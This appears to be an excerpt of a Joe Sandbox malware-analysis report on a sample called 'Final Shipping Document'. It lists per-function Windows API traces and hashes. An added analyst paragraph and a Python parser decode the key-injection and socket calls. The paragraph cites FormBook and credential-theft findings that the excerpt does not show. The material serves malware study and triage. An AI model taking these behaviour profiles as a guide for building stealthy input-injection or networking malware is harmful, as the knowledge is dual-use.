                                                            • Instruction Fuzzy Hash: 22910471A00219AFDB00DF94D884BFEB7F5FF46710F184029EA11E7291D778A981EB90
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ObjectSelect$BeginCreatePath
                                                            • String ID:
                                                            • API String ID: 3225163088-0
                                                            • Opcode ID: e39fa1d429353ec9bd56f9239a445be87904d2ba1ee7880564496036af4306fa
                                                            • Instruction ID: 62d23c735b8524f03e68e08c489dd3de0b250face4f6c49e79fd8396272832c6
                                                            • Opcode Fuzzy Hash: e39fa1d429353ec9bd56f9239a445be87904d2ba1ee7880564496036af4306fa
                                                            • Instruction Fuzzy Hash: 6F911571D40219EFCB14CFA9CC84AEEBBB8FF49320F148595E615B7251D7B4AA42CB60
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 00C2396B
                                                            • CharUpperBuffW.USER32(?,?), ref: 00C23A7A
                                                            • _wcslen.LIBCMT ref: 00C23A8A
                                                            • VariantClear.OLEAUT32(?), ref: 00C23C1F
                                                              • Part of subcall function 00C10CDF: VariantInit.OLEAUT32(00000000), ref: 00C10D1F
                                                              • Part of subcall function 00C10CDF: VariantCopy.OLEAUT32(?,?), ref: 00C10D28
                                                              • Part of subcall function 00C10CDF: VariantClear.OLEAUT32(?), ref: 00C10D34
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                            • API String ID: 4137639002-1221869570
                                                            • Opcode ID: 3c5c5c9ae61be247ee661e4055c5b4f95d1a06ba4ab786399de6bc037879cd89
                                                            • Instruction ID: fcabe4da6b58b6d1507983a4e233095037774fc98c98a31c83e3f65fa4de9a62
                                                            • Opcode Fuzzy Hash: 3c5c5c9ae61be247ee661e4055c5b4f95d1a06ba4ab786399de6bc037879cd89
                                                            • Instruction Fuzzy Hash: 3091A874A083519FC700EF28C48096AB7E4FF89714F04896EF89A9B351DB34EE45CB92
                                                            APIs
                                                              • Part of subcall function 00C0000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00BFFF41,80070057,?,?,?,00C0035E), ref: 00C0002B
                                                              • Part of subcall function 00C0000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00BFFF41,80070057,?,?), ref: 00C00046
                                                              • Part of subcall function 00C0000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00BFFF41,80070057,?,?), ref: 00C00054
                                                              • Part of subcall function 00C0000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00BFFF41,80070057,?), ref: 00C00064
                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00C24C51
                                                            • _wcslen.LIBCMT ref: 00C24D59
                                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00C24DCF
                                                            • CoTaskMemFree.OLE32(?), ref: 00C24DDA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                            • String ID: NULL Pointer assignment
                                                            • API String ID: 614568839-2785691316
                                                            • Opcode ID: 7d0e4baa42b11d25ea57c6675669e7208c62b029fabf3d98a2ee55b1506ccd2b
                                                            • Instruction ID: 9a60d1484e589c82f320a290da3187752ec272ac3137ae5538000d29b474bbcb
                                                            • Opcode Fuzzy Hash: 7d0e4baa42b11d25ea57c6675669e7208c62b029fabf3d98a2ee55b1506ccd2b
                                                            • Instruction Fuzzy Hash: 30912671D00229AFDF14DFA4D891AEEB7B8BF08304F108569E915A7291DB749A44CFA0
                                                            APIs
                                                            • GetMenu.USER32(?), ref: 00C32183
                                                            • GetMenuItemCount.USER32(00000000), ref: 00C321B5
                                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00C321DD
                                                            • _wcslen.LIBCMT ref: 00C32213
                                                            • GetMenuItemID.USER32(?,?), ref: 00C3224D
                                                            • GetSubMenu.USER32(?,?), ref: 00C3225B
                                                              • Part of subcall function 00C03A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C03A57
                                                              • Part of subcall function 00C03A3D: GetCurrentThreadId.KERNEL32 ref: 00C03A5E
                                                              • Part of subcall function 00C03A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00C025B3), ref: 00C03A65
                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00C322E3
                                                              • Part of subcall function 00C0E97B: Sleep.KERNEL32 ref: 00C0E9F3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                            • String ID:
                                                            • API String ID: 4196846111-0
                                                            • Opcode ID: edcb3f4cc72bfbd3ccce6937328cefc1c6eeae60785d0c5d823ca8e57430417f
                                                            • Instruction ID: e34065f48aca57e778595f211cfbf21ac9f6ae9e3713d95bf07cd46a011a964b
                                                            • Opcode Fuzzy Hash: edcb3f4cc72bfbd3ccce6937328cefc1c6eeae60785d0c5d823ca8e57430417f
                                                            • Instruction Fuzzy Hash: F7718F75A10205AFCF10EF65C885AAEB7F5EF48320F148499E826EB351DB35EE419F90
                                                            APIs
                                                            • GetParent.USER32(?), ref: 00C0AEF9
                                                            • GetKeyboardState.USER32(?), ref: 00C0AF0E
                                                            • SetKeyboardState.USER32(?), ref: 00C0AF6F
                                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 00C0AF9D
                                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 00C0AFBC
                                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 00C0AFFD
                                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00C0B020
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: MessagePost$KeyboardState$Parent
                                                            • String ID:
                                                            • API String ID: 87235514-0
                                                            • Opcode ID: ac79afc7cc43de43786b0cbf117797be81701ebdc91e0cf13c947173cf5abf48
                                                            • Instruction ID: b8ec5d739811dc8055c08656f38617b21061b43704c18e89b1168cd593e8a618
                                                            • Opcode Fuzzy Hash: ac79afc7cc43de43786b0cbf117797be81701ebdc91e0cf13c947173cf5abf48
                                                            • Instruction Fuzzy Hash: 1351B3E06147D63DFB368374CC45BBA7EA95B06304F088589F1E9954C2C398AED4D751
                                                            APIs
                                                            • GetParent.USER32(00000000), ref: 00C0AD19
                                                            • GetKeyboardState.USER32(?), ref: 00C0AD2E
                                                            • SetKeyboardState.USER32(?), ref: 00C0AD8F
                                                            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00C0ADBB
                                                            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00C0ADD8
                                                            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00C0AE17
                                                            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00C0AE38
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: MessagePost$KeyboardState$Parent
                                                            • String ID:
                                                            • API String ID: 87235514-0
                                                            • Opcode ID: 056347c09957cfb57e98c8570ad531ac4b95e8a4116299a6230c314ec9d1694b
                                                            • Instruction ID: 07e637615d420927c51a212f172b6e0e138876feb67c32d5cb36adf9bc7a18c7
                                                            • Opcode Fuzzy Hash: 056347c09957cfb57e98c8570ad531ac4b95e8a4116299a6230c314ec9d1694b
                                                            • Instruction Fuzzy Hash: 7F51F5A15087D53DFB378334CC95BBABEA85B46300F088489E1F5568C3D294EE98E762
                                                            APIs
                                                            • GetConsoleCP.KERNEL32(00BE3CD6,?,?,?,?,?,?,?,?,00BD5BA3,?,?,00BE3CD6,?,?), ref: 00BD5470
                                                            • __fassign.LIBCMT ref: 00BD54EB
                                                            • __fassign.LIBCMT ref: 00BD5506
                                                            • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00BE3CD6,00000005,00000000,00000000), ref: 00BD552C
                                                            • WriteFile.KERNEL32(?,00BE3CD6,00000000,00BD5BA3,00000000,?,?,?,?,?,?,?,?,?,00BD5BA3,?), ref: 00BD554B
                                                            • WriteFile.KERNEL32(?,?,00000001,00BD5BA3,00000000,?,?,?,?,?,?,?,?,?,00BD5BA3,?), ref: 00BD5584
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                            • String ID:
                                                            • API String ID: 1324828854-0
                                                            • Opcode ID: abcaa10018421ada28d69f3e35505c642540ef47fe17bf70c30993c7e05258ab
                                                            • Instruction ID: 4ccc948a2ac78f6c59ba463e308bcf961e14d2cdffd417775d8d04c03c7e48b7
                                                            • Opcode Fuzzy Hash: abcaa10018421ada28d69f3e35505c642540ef47fe17bf70c30993c7e05258ab
                                                            • Instruction Fuzzy Hash: 0551C2749006499FDB21CFA8D881BEEFBF9EF18300F14415BE555E7391E6309A41CB60
                                                            APIs
                                                            • _ValidateLocalCookies.LIBCMT ref: 00BC2D4B
                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 00BC2D53
                                                            • _ValidateLocalCookies.LIBCMT ref: 00BC2DE1
                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00BC2E0C
                                                            • _ValidateLocalCookies.LIBCMT ref: 00BC2E61
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                            • String ID: csm
                                                            • API String ID: 1170836740-1018135373
                                                            • Opcode ID: ba50ba4cce7e56378d4e7369d493abf8354407a802800d86170cf6e25ad10f55
                                                            • Instruction ID: f52b273df9e2acf505804c6209f24529f4e5c1611d653f36f83759c0509e1e7b
                                                            • Opcode Fuzzy Hash: ba50ba4cce7e56378d4e7369d493abf8354407a802800d86170cf6e25ad10f55
                                                            • Instruction Fuzzy Hash: F4418334A00209ABCF10DF68C885F9EBBF5FF55324F1481A9E915AB392D7319A15CBD1
                                                            APIs
                                                              • Part of subcall function 00C2304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00C2307A
                                                              • Part of subcall function 00C2304E: _wcslen.LIBCMT ref: 00C2309B
                                                            • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00C21112
                                                            • WSAGetLastError.WSOCK32 ref: 00C21121
                                                            • WSAGetLastError.WSOCK32 ref: 00C211C9
                                                            • closesocket.WSOCK32(00000000), ref: 00C211F9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                            • String ID:
                                                            • API String ID: 2675159561-0
                                                            • Opcode ID: ed92e9bf72093cbead237c94341f07b6bf6fdbfceb75016cdd299710d13c89a9
                                                            • Instruction ID: 2f9dd9b1200aba4491b78a510259f9bb4d02dfdaaf36b1b35eed8ce29055ba87
                                                            • Opcode Fuzzy Hash: ed92e9bf72093cbead237c94341f07b6bf6fdbfceb75016cdd299710d13c89a9
                                                            • Instruction Fuzzy Hash: CB41F631600214AFDB109F24D885BAEBBE9FF55324F188059FD15AB292C774EE45CBE1
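The two PostMessageW functions above (refs 00C0AF9D..00C0B020 and 00C0ADBB..00C0AE38) and the socket function directly above are easier to read once the literals are decoded: message 0x0100 is WM_KEYDOWN, 0x0101 is WM_KEYUP, and the wParam values 0x10, 0x11, 0x12 and 0x5B are VK_SHIFT, VK_CONTROL, VK_MENU (Alt) and VK_LWIN, so together with GetKeyboardState/SetKeyboardState the pair presses and releases the modifier keys of a target window; socket(2, 1, 6) is socket(AF_INET, SOCK_STREAM, IPPROTO_TCP). Both patterns are consistent with stock routines of the AutoIt3 interpreter (its ControlSend and TCPConnect built-ins), which fits the "compiled AutoIt script" verdict and the AUTOIT.ERROR string in this dump. The caveat for triage is that such interpreter routines exist in every compiled AutoIt binary, so on their own they are not a FormBook indicator; the sample-specific behaviour is the process injection and credential access listed in the signatures, which runs from the injected code rather than from these functions.

The script below is an added example, not part of the Joe Sandbox report or of its IDA plugin: it parses "APIs" lines in the layout shown on this page, decodes the constants into SDK names, and tags each function with a coarse behaviour label. SAMPLE is a constructed excerpt copied from the records above; LINE_RE, the tag names and the split on the "APIs" header are my own assumptions about the report layout, not a Joe Sandbox API.

```python
import re
from typing import Dict, List, Optional

# Constructed input: "APIs" lines copied from three function records in this
# report (the two PostMessageW key-injection functions and the TCP socket one).
SAMPLE = """\
APIs
• GetParent.USER32(?), ref: 00C0AEF9
• GetKeyboardState.USER32(?), ref: 00C0AF0E
• SetKeyboardState.USER32(?), ref: 00C0AF6F
• PostMessageW.USER32(?,00000101,00000010,?), ref: 00C0AF9D
• PostMessageW.USER32(?,00000101,00000012,?), ref: 00C0AFFD
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 00C0B020
APIs
• GetParent.USER32(00000000), ref: 00C0AD19
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00C0ADBB
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00C0AE38
APIs
  • Part of subcall function 00C2304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00C2307A
  • Part of subcall function 00C2304E: _wcslen.LIBCMT ref: 00C2309B
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00C21112
• WSAGetLastError.WSOCK32 ref: 00C21121
• closesocket.WSOCK32(00000000), ref: 00C211F9
"""

# "• Name.MODULE(args), ref: ADDR"; the parens and the subcall prefix are optional
# (assumed grammar, derived from the lines on this page).
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)

# Win32 / Winsock constants (SDK header values) for the literals in the dump.
WM_NAMES = {0x0100: "WM_KEYDOWN", 0x0101: "WM_KEYUP", 0x0111: "WM_COMMAND",
            0x00F0: "BM_GETCHECK", 0x00F1: "BM_SETCHECK"}
VK_NAMES = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN"}
SOCKET_ARGS = ({2: "AF_INET"}, {1: "SOCK_STREAM"}, {6: "IPPROTO_TCP"})

def parse_call(line: str) -> Optional[Dict]:
    """Parse one API line; '?' arguments become None, hex literals become ints."""
    m = LINE_RE.match(line)
    if not m:
        return None
    raw = m.group("args")
    toks = [t.strip() for t in raw.split(",")] if raw else []
    args = [None if t == "?" else int(t, 16) for t in toks if t]
    return {"name": m.group("name"), "module": m.group("module"),
            "args": args, "ref": m.group("ref"), "subcall": m.group("sub")}

def decode_call(call: Dict) -> str:
    """Render a call with known constant arguments replaced by SDK names."""
    name, args = call["name"], call["args"]
    if name in ("PostMessageW", "SendMessageW") and len(args) > 1 and args[1] is not None:
        msg = args[1]
        msg_name = WM_NAMES.get(msg, "0x%04X" % msg)
        if msg in (0x0100, 0x0101) and len(args) > 2 and args[2] is not None:
            vk_name = VK_NAMES.get(args[2], "VK 0x%02X" % args[2])
            return "%s(%s, %s)" % (name, msg_name, vk_name)
        return "%s(%s)" % (name, msg_name)
    if name == "socket" and len(args) >= 3 and None not in args[:3]:
        parts = [table.get(v, str(v)) for table, v in zip(SOCKET_ARGS, args)]
        return "socket(%s)" % ", ".join(parts)
    return name

def classify(block: Dict) -> List[str]:
    """Behaviour tags (names chosen here, not Joe Sandbox's) for one function."""
    names = {c["name"] for c in block["calls"]}
    tags = []
    if any("WM_KEYDOWN" in d or "WM_KEYUP" in d for d in block["decoded"]):
        tags.append("synthetic-keyboard-input")
    if "SetKeyboardState" in names:
        tags.append("keyboard-state-write")
    if any(d.startswith("socket(AF_INET, SOCK_STREAM") for d in block["decoded"]):
        tags.append("tcp-socket")
    return tags

def summarize(text: str) -> List[Dict]:
    """Split the dump on 'APIs' headers and return one record per function."""
    blocks: List[Dict] = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            blocks.append({"calls": [], "decoded": [], "tags": []})
            continue
        call = parse_call(line)
        if call is None or not blocks:
            continue
        blocks[-1]["calls"].append(call)
        blocks[-1]["decoded"].append(decode_call(call))
    for block in blocks:
        block["tags"] = classify(block)
    return blocks

if __name__ == "__main__":
    for i, block in enumerate(summarize(SAMPLE), 1):
        print("function %d [%s]: %s" % (i, ", ".join(block["tags"]), "; ".join(block["decoded"])))
```

Run against the full report text instead of SAMPLE, the same split yields one record per function and the tags give a quick way to separate interpreter plumbing (key injection, menu handling, TCP helpers) from the records worth spending reverse-engineering time on; "Part of subcall function" lines keep their parent address in the subcall field so nested attributions are not lost.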
                                                            APIs
                                                              • Part of subcall function 00C0DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C0CF22,?), ref: 00C0DDFD
                                                              • Part of subcall function 00C0DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C0CF22,?), ref: 00C0DE16
                                                            • lstrcmpiW.KERNEL32(?,?), ref: 00C0CF45
                                                            • MoveFileW.KERNEL32(?,?), ref: 00C0CF7F
                                                            • _wcslen.LIBCMT ref: 00C0D005
                                                            • _wcslen.LIBCMT ref: 00C0D01B
                                                            • SHFileOperationW.SHELL32(?), ref: 00C0D061
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                            • String ID: \*.*
                                                            • API String ID: 3164238972-1173974218
                                                            • Opcode ID: e05bb3f2616ff01274c57aaf5677aa856b0fa213b3ca03e5f3f597855020827e
                                                            • Instruction ID: c0dc893c3ae368f78847436c9c738578bf6e83e16137ccb8cc12c7ad33939441
                                                            • Opcode Fuzzy Hash: e05bb3f2616ff01274c57aaf5677aa856b0fa213b3ca03e5f3f597855020827e
                                                            • Instruction Fuzzy Hash: 0C4135B19452195EDF12EBA4D9C1FDEB7F9AF48380F1000E6E505EB182EB34A784DB51
                                                            APIs
                                                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00C32E1C
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00C32E4F
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00C32E84
                                                            • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00C32EB6
                                                            • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00C32EE0
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00C32EF1
                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00C32F0B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: LongWindow$MessageSend
                                                            • String ID:
                                                            • API String ID: 2178440468-0
                                                            • Opcode ID: 58bfe0d3a09b618d9d9bb5819e9afdbd273f92ba1401fee07b8adb2549bd548d
                                                            • Instruction ID: 3008aa586455a5e060c4d8c1ffc6e6fa1c3fa9f33e165d452efcf345e3627e39
                                                            • Opcode Fuzzy Hash: 58bfe0d3a09b618d9d9bb5819e9afdbd273f92ba1401fee07b8adb2549bd548d
                                                            • Instruction Fuzzy Hash: 9F311331614250AFDF20CF58DC86F6937E0EB8AB21F180164FA149B2B1CB71AD80DB40
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C07769
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C0778F
                                                            • SysAllocString.OLEAUT32(00000000), ref: 00C07792
                                                            • SysAllocString.OLEAUT32(?), ref: 00C077B0
                                                            • SysFreeString.OLEAUT32(?), ref: 00C077B9
                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 00C077DE
                                                            • SysAllocString.OLEAUT32(?), ref: 00C077EC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                            • String ID:
                                                            • API String ID: 3761583154-0
                                                            • Opcode ID: 89c304296b5f2b97a85c52010ed0659b4f6df455edcf94ceaa98c022cf6dcdca
                                                            • Instruction ID: 8199827e888421cfbbdcfd2fc5d3970d44f1149c83da1c65fbf11d1c9f4fc373
